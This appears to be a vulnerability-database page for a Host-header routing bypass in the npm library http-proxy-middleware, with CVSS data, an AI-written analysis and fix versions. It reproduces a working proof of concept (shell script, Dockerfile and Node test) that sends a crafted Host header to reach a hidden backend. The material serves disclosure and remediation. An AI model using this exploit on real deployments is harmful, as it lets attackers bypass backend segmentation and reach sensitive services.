Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Network-exploitable with no privileges or user interaction; scope changes as requests reach an unintended backend, with limited confidentiality and integrity impact on that system.
Primary rating from Vendor (https://github.com/chimurai/http-proxy-middleware).
CVSS VectorVendor: https://github.com/chimurai/http-proxy-middleware
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
3Blast Radius
ecosystem impact- 60 npm packages depend on http-proxy-middleware (13 direct, 47 indirect)
Ecosystem-wide dependent count for version 3.0.0.
DescriptionCVE.org
Summary
http-proxy-middleware documents router proxy-table entries as host, path, or host+path selectors, but the host+path implementation uses unanchored substring matching on attacker-controlled request metadata. As a result, a crafted Host header that is only a superstring match for a configured host+path key can still route a request to an unintended backend.
Details
Tested code state:
- validated on tag
v4.0.0-beta.5 - corresponding commit:
339f09ede860197807d4fd99ed9020fa5d0bd358
Relevant code locations:
src/router.tssrc/http-proxy-middleware.ts
Affected public API:
createProxyMiddleware({ router: { 'host/path': 'http://target' } })
Code explanation:
When a proxy-table router key contains /, getTargetFromProxyTable() concatenates attacker-controlled req.headers.host and req.url into a single hostAndPath string, then accepts the route if:
hostAndPath.indexOf(key) > -1That is a substring test, not an exact host match plus intended path match. In the validated PoC, the configured router key is:
localhost:3000/apibut the attacker-controlled host is:
evillocalhost:3000and the request path is:
/apiThe concatenated attacker-controlled string:
evillocalhost:3000/apistill contains the configured router key as a substring, so the middleware selects the alternate backend even though the host is not equal to the configured host.
Exploit path:
- the application enables the documented proxy-table
routerfeature with at least one host+path rule - an external attacker sends an ordinary HTTP request with a crafted
Hostheader HttpProxyMiddleware.prepareProxyRequest()applies router selection before proxyinggetTargetFromProxyTable()accepts the craftedHost + pathstring through substring matching- the request is proxied to the wrong backend
PoC
Create these files in the same working directory and run:
bash ./run.shFile: run.sh
#!/usr/bin/env bash
set -euo pipefail
SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
REPO_URL="https://github.com/chimurai/http-proxy-middleware.git"
REPO_REF="v4.0.0-beta.5"
WORKDIR="$(mktemp -d "${SCRIPT_DIR}/.tmp-repro.XXXXXX")"
TARGET_REPO_DIR="${WORKDIR}/repo"
REPRO_DIR="${WORKDIR}/reproduction"
IMAGE_TAG="http-proxy-middleware-router-bypass-poc"
cleanup() {
rm -rf "${WORKDIR}"
}
trap cleanup EXIT
echo "[a3] cloning target repository"
git clone --quiet "${REPO_URL}" "${TARGET_REPO_DIR}"
git -C "${TARGET_REPO_DIR}" checkout --quiet "${REPO_REF}"
mkdir -p "${REPRO_DIR}"
cp "${SCRIPT_DIR}/Dockerfile" "${WORKDIR}/Dockerfile"
cp "${SCRIPT_DIR}/verify.mjs" "${REPRO_DIR}/verify.mjs"
echo "[a3] building reproduction image"
docker build -f "${WORKDIR}/Dockerfile" -t "${IMAGE_TAG}" "${WORKDIR}"
echo "[a3] running verification"
docker run --rm "${IMAGE_TAG}" node /work/reproduction/verify.mjsFile: Dockerfile
FROM node:22-bullseye
WORKDIR /work
COPY repo/package.json repo/yarn.lock /work/repo/
RUN corepack enable \
&& cd /work/repo \
&& yarn install --frozen-lockfile
COPY repo /work/repo
RUN cd /work/repo && yarn build
COPY reproduction /work/reproductionFile: verify.mjs
import http from 'node:http';
import fs from 'node:fs';
import assert from 'node:assert/strict';
import { createProxyMiddleware } from '/work/repo/dist/index.js';
const ROUTER_KEY = 'localhost:3000/api';
const CRAFTED_HOST = 'evillocalhost:3000';
function listen(server, port) {
return new Promise((resolve) => {
server.listen(port, '127.0.0.1', () => resolve());
});
}
function close(server) {
return new Promise((resolve, reject) => {
server.close((err) => {
if (err) {
reject(err);
return;
}
resolve();
});
});
}
function request(path, host) {
return new Promise((resolve, reject) => {
const req = http.request(
{
host: '127.0.0.1',
port: 3000,
path,
method: 'GET',
headers: {
Host: host,
},
},
(res) => {
let data = '';
res.setEncoding('utf8');
res.on('data', (chunk) => {
data += chunk;
});
res.on('end', () => {
resolve({ statusCode: res.statusCode, body: data });
});
},
);
req.on('error', reject);
req.end();
});
}
const defaultBackend = http.createServer((req, res) => {
res.end('DEFAULT');
});
const secretBackend = http.createServer((req, res) => {
res.end('SECRET');
});
const proxyMiddleware = createProxyMiddleware({
target: 'http://127.0.0.1:3101',
router: {
[ROUTER_KEY]: 'http://127.0.0.1:3102',
},
});
const proxyServer = http.createServer((req, res) => {
proxyMiddleware(req, res, () => {
res.statusCode = 404;
res.end('NO_PROXY');
});
});
try {
assert.ok(fs.existsSync('/work/repo/dist/index.js'));
assert.ok(fs.existsSync('/work/reproduction/verify.mjs'));
await listen(defaultBackend, 3101);
await listen(secretBackend, 3102);
await listen(proxyServer, 3000);
console.log('STEP start-services ok');
const baseline = await request('/api', 'safe.example:3000');
assert.equal(baseline.statusCode, 200);
assert.equal(baseline.body, 'DEFAULT');
console.log(`STEP baseline-route body=${baseline.body}`);
const crafted = await request('/api', CRAFTED_HOST);
assert.equal(crafted.statusCode, 200);
assert.equal(crafted.body, 'SECRET');
assert.notEqual(CRAFTED_HOST, ROUTER_KEY.split('/')[0]);
console.log(`STEP crafted-route body=${crafted.body}`);
console.log('RESULT reproduced host_header_injection router substring match bypass');
} finally {
await Promise.allSettled([close(proxyServer), close(defaultBackend), close(secretBackend)]);
}This PoC starts:
- one default backend returning
DEFAULT - one alternate backend returning
SECRET - one proxy using:
createProxyMiddleware({
target: 'http://127.0.0.1:3101',
router: {
[ROUTER_KEY]: 'http://127.0.0.1:3102',
},
});It then sends:
- a baseline request to
/apiwithHost: safe.example:3000 - a crafted request to
/apiwithHost: evillocalhost:3000
Observed result from the validated PoC:
- baseline request:
STEP baseline-route body=DEFAULT - crafted request:
STEP crafted-route body=SECRET - success marker:
RESULT reproduced host_header_injection router substring match bypass
The PoC is considered successful only if:
- the baseline request stays on the default backend
- the crafted request reaches the alternate backend
- the crafted host is not equal to the configured router host
Impact
This is a backend-selection integrity issue in a documented library feature. Applications that use host+path router-table rules for backend segmentation, tenant routing, or separation of public and more sensitive upstreams can have that routing boundary bypassed by an unauthenticated external client using an ordinary crafted Host header.
AnalysisAI
Backend routing bypass in http-proxy-middleware allows unauthenticated external attackers to redirect HTTP requests to unintended backends by sending a crafted Host header that acts as a superstring of a configured host+path router key. The vulnerable substring matching logic (hostAndPath.indexOf(key) > -1 in src/router.ts) affects npm package versions 0.16.0 through 3.0.5 and 4.0.0 through v4.0.0-beta.5, enabling bypass of tenant isolation, backend segmentation, or access-control boundaries enforced through proxy routing rules. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires that the target application uses the `router` proxy-table feature of http-proxy-middleware with at least one host+path compound key - specifically, a router key containing a `/` character that combines a hostname and path segment (e.g., `'hostname:port/path': 'http://target'`). … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | No official CVSS score has been assigned by NVD or the reporter at time of analysis; the independently assessed vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N places this vulnerability in the High severity range (approximately 7.2). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker targeting an application configured with `createProxyMiddleware({ router: { 'internalapp:3000/api': 'http://sensitive-internal-backend' } })` sends a standard HTTP GET to the proxy with `Host: evilinternalapp:3000` and path `/api`. The concatenated string `evilinternalapp:3000/api` passes the `indexOf('internalapp:3000/api') > -1` substring check, causing the middleware to forward the request to the sensitive internal backend rather than the default public target. … |
| Remediation | Upgrade http-proxy-middleware to version 3.0.6 (for applications on the v3 stable branch) or 4.1.0 (for applications on the v4 branch) - these are vendor-confirmed fix versions per GHSA-64mm-vxmg-q3vj (https://github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-64mm-vxmg-q3vj). … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl
runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac
Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post
Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build
Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l
Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c
Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2
An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du
Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve
Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at
Same weakness CWE-20 – Improper Input Validation
View allSame technique Information Disclosure
View allVendor StatusVendor
Share
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-38300
GHSA-64mm-vxmg-q3vj